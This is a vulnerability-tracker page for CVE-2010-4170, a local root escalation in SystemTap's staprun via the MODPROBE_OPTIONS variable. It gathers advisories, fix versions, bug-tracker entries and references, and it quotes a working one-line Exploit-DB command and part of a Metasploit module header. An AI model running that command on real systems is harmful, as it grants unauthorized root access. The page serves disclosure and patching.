CVE-2010-4170
published 2010-12-07CVE-2010-4170: The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by…
PriorityP339high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
4.80%
90.8th percentile
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | systemtap | < systemtap 1.2-3 (bookworm) | systemtap 1.2-3 (bookworm) |
| systemtap | systemtap | — | — |
| systemtap | systemtap | >= 0 < 1.2-3 | 1.2-3 |
| systemtap | systemtap | >= 0 < 1.2-3 | 1.2-3 |
| systemtap | systemtap | >= 0 < 1.2-3 | 1.2-3 |
| systemtap | systemtap | >= 0 < 1.2-3 | 1.2-3 |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.2HIGH
vendor_debian7.2HIGH
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j34m-wwxr-2pj4: The staprun runtime tool in SystemTap 1
ghsa_unreviewed·2022-05-14
CVE-2010-4170 [HIGH] GHSA-j34m-wwxr-2pj4: The staprun runtime tool in SystemTap 1
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
OSV
CVE-2010-4170: The staprun runtime tool in SystemTap 1
osv·2010-12-07·CVSS 7.2
CVE-2010-4170 [HIGH] CVE-2010-4170: The staprun runtime tool in SystemTap 1
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
Red Hat
Systemtap: Insecure loading of modules
vendor_redhat·2010-11-17·CVSS 7.2
CVE-2010-4170 [HIGH] CWE-284 Systemtap: Insecure loading of modules
Systemtap: Insecure loading of modules
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
Debian
CVE-2010-4170: systemtap - The staprun runtime tool in SystemTap 1.3 does not properly clear the environmen...
vendor_debian·2010·CVSS 7.2
CVE-2010-4170 [HIGH] CVE-2010-4170: systemtap - The staprun runtime tool in SystemTap 1.3 does not properly clear the environmen...
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
Scope: local
bookworm: resolved (fixed in 1.2-3)
bullseye: resolved (fixed in 1.2-3)
forky: resolved (fixed in 1.2-3)
sid: resolved (fixed in 1.2-3)
trixie: resolved (fixed in 1.2-3)
No detection rules found.
Exploit-DB
SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)
exploitdb·2019-04-19
CVE-2010-4170 SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)
SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges by exploiting a
vulnerability in the `staprun` executable included with SystemTap
version 1.3.
The `staprun` executable does not clear environment variables prior to
executing `modprobe`, allowing an arbitrary configuration file to be
specified in the `MODPROBE_OPTIONS` environment variable, resulting
in arbitrary command execution with root privileges.
This module has been tested successfully on:
systemtap 1.2-1.fc13-i686 on Fedora 13 (i686
Exploit-DB
SystemTap - Local Privilege Escalation
exploitdb·2010-11-26·CVSS 7.2
CVE-2010-4170 [HIGH] SystemTap - Local Privilege Escalation
SystemTap - Local Privilege Escalation
---
CVE-2010-4170
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
RHEL Advisory:
https://rhn.redhat.com/errata/RHSA-2010-0894.html
Metasploit
SystemTap MODPROBE_OPTIONS Privilege Escalation
metasploit
SystemTap MODPROBE_OPTIONS Privilege Escalation
SystemTap MODPROBE_OPTIONS Privilege Escalation
This module attempts to gain root privileges by exploiting a vulnerability in the `staprun` executable included with SystemTap version 1.3. The `staprun` executable does not clear environment variables prior to executing `modprobe`, allowing an arbitrary configuration file to be specified in the `MODPROBE_OPTIONS` environment variable, resulting in arbitrary command execution with root privileges. This module has been tested successfully on: systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and systemtap 1.1-3.el5 on RHEL 5.5 (x64).
Bugzilla
CVE-2010-4170 CVE-2010-4171 systemtap various flaws [fedora-all]
bugzilla·2010-11-17·CVSS 7.2
CVE-2010-4170 [HIGH] CVE-2010-4170 CVE-2010-4171 systemtap various flaws [fedora-all]
CVE-2010-4170 CVE-2010-4171 systemtap various flaws [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=653604
Please note: this issue affects multiple supported
Bugzilla
CVE-2010-4170 Systemtap: Insecure loading of modules
bugzilla·2010-11-15·CVSS 7.2
CVE-2010-4170 [HIGH] CVE-2010-4170 Systemtap: Insecure loading of modules
CVE-2010-4170 Systemtap: Insecure loading of modules
It was found that systemtap runtime tool (staprun)
did not handle the loading of user specified modules
securely. A local attacker could use this flaw to
escalate their privileges.
References:
[1] http://sources.redhat.com/ml/systemtap/2010-q4/msg00230.html
Upstream changeset:
[2] http://sources.redhat.com/git/gitweb.cgi?p=systemtap.git;a=commit;h=b7565b41228bea196cefa3a7d43ab67f8f9152e2
Acknowledgements:
Red Hat would like to thank Tavis Ormandy for reporting this issue.
Discussion:
This issue affects the versions of the systemtap package, as shipped
with Red Hat Enterprise Linux 4, 5 and 6.
--
This issue affects the versions of the systemtap package, as shipped
with Fedora release of 12 and 13.
---
The CVE identifier of CVE-
http://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-November/051122.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-November/051127.htmlhttp://packetstormsecurity.com/files/152569/SystemTap-1.3-MODPROBE_OPTIONS-Privilege-Escalation.htmlhttp://secunia.com/advisories/42256http://secunia.com/advisories/42263http://secunia.com/advisories/42306http://secunia.com/advisories/42318http://secunia.com/advisories/46920http://sources.redhat.com/git/gitweb.cgi?p=systemtap.git%3Ba=commit%3Bh=b7565b41228bea196cefa3a7d43ab67f8f9152e2http://sources.redhat.com/ml/systemtap/2010-q4/msg00230.htmlhttp://www.debian.org/security/2011/dsa-2348http://www.exploit-db.com/exploits/15620http://www.redhat.com/support/errata/RHSA-2010-0894.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0895.htmlhttp://www.securityfocus.com/bid/44914http://www.securitytracker.com/id?1024754https://exchange.xforce.ibmcloud.com/vulnerabilities/63344https://www.exploit-db.com/exploits/46730/http://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-November/051122.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-November/051127.htmlhttp://packetstormsecurity.com/files/152569/SystemTap-1.3-MODPROBE_OPTIONS-Privilege-Escalation.htmlhttp://secunia.com/advisories/42256http://secunia.com/advisories/42263http://secunia.com/advisories/42306http://secunia.com/advisories/42318http://secunia.com/advisories/46920http://sources.redhat.com/git/gitweb.cgi?p=systemtap.git%3Ba=commit%3Bh=b7565b41228bea196cefa3a7d43ab67f8f9152e2http://sources.redhat.com/ml/systemtap/2010-q4/msg00230.htmlhttp://www.debian.org/security/2011/dsa-2348http://www.exploit-db.com/exploits/15620http://www.redhat.com/support/errata/RHSA-2010-0894.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0895.htmlhttp://www.securityfocus.com/bid/44914http://www.securitytracker.com/id?1024754https://exchange.xforce.ibmcloud.com/vulnerabilities/63344https://www.exploit-db.com/exploits/46730/
2010-12-07
Published